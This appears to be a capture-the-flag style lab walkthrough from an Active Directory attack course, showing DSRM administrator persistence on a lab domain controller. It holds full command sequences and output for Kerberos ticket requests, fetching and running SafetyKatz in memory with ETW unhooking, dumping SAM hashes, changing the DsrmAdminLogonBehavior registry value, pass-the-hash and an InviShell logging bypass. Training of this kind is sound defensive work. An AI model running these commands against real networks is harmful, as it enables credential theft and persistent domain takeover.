Learning Object 11
Tasks
1 – Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence
Flag 20 [dcorp-dc] – Name of the Registry key modified to change Logon behavior of DSRM administrator 🚩
Solutions
1 – Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence
To obtain a persistance with administrative access to the DC we need to have Domain Admin privileges by abusing the DSRM administrator:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttAs usual, into the new shell spawned we need to run the following commands for copying Loader.exe to the DC and extract credentials from the SAM hive: [Local Users]
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
.
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
C:\AD\Tools\Loader.exe
1 File(s) copied
C:\Windows\system32>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : token::elevate lsadump::evasive-sam exit
.#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
616 {0;000003e7} 1 D 20261 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;042bf404} 0 D 70059994 dcorp\svcadmin S-1-5-21-719815819-3726368948-3917688648-1118 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 70110579 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::evasive-sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870
SAMKey : f3a9473cb084668dcf1d7e5f47562659
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
mimikatz(commandline) # exit
Bye!
C:\Users\svcadmin>
.
Compare the Administrator hash with the Administrator hash of below command
SafetyKatz.exe -args "token::elevate" "lsadump::evasive-lsa /patch" "exit"
mimikatz(commandline) # lsadump::evasive-lsa /patch Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648 RID : 000001f4 (500) User : Administrator LM : NTLM : af0686cc0ca8f04df42210c9ac980760
This shows a different Administrator hash ( the one from the domain administrator, not the one used for DSRM)
The DSRM administrator is not allowed to logon to the DC from network, so we need to change the logon behavior for the account by modifying registry on the DC. We can do this as follows:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /fC:\Users\svcadmin>reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f The operation completed successfully. C:\Users\svcadmin>
Now on the student VM, [from a high intigrity cmd shell]we can use Pass-The-Hash (not OverPass-The-Hash) for the DSRM administrator:
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"From the new process, we can now access dcorp-dc. In this case we are using PowerShell Remoting with IP address and Authentication: ‘NegotiateWithImplicitCredential’ as we are using NTLM authentication. So, it’s necessary to modify TrustedHosts for the student VM running the below command from an elevated PowerShell session:
Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1Now, run the commands below to access the DC:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.batEnter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential$env:username.
c:\Users\student98>C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit" [+] Successfully unhooked ETW! [+++] NTDLL.DLL IS UNHOOKED! [+++] KERNEL32.DLL IS UNHOOKED! [+++] KERNELBASE.DLL IS UNHOOKED! [+++] ADVAPI32.DLL IS UNHOOKED! [+] URL/PATH : C:\AD\Tools\SafetyKatz.exe Arguments : .#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe user : Administrator domain : dcorp-dc program : cmd.exe impers. : no NTLM : a102ad5753f4c441e3af31c97fad86fd | PID 8812 | TID 8832 | LSA Process is now R/W | LUID 0 ; 366768920 (00000000:15dc7318) \_ msv1_0 - data copy @ 0000026BDA6ED640 : OK ! \_ kerberos - data copy @ 0000026BDB06E798 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000026BDB062A98 (32) -> null mimikatz(commandline) # exit Bye! c:\Users\student98>
from Spawned Prosess : Administrator:C:\WINDOWS\SYSTEM32\cmd.exe – powershell
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1
'Set-Item' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1
WinRM Security Configuration.
This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be
authenticated. The client might send credential information to these computers. Are you sure that you want to modify
this list?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
PS C:\Windows\system32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> Enter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents> $env:username
Administrator
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents> $env:computername
DCORP-DC
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents>
Flag 20 [dcorp-dc] – Name of the Registry key modified to change Logon behavior of DSRM administrator 🚩
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /fBased on the last command, the registry key modified to change Logon behavior of DSRM administrator is: XXXXXXXXXXXBehavior.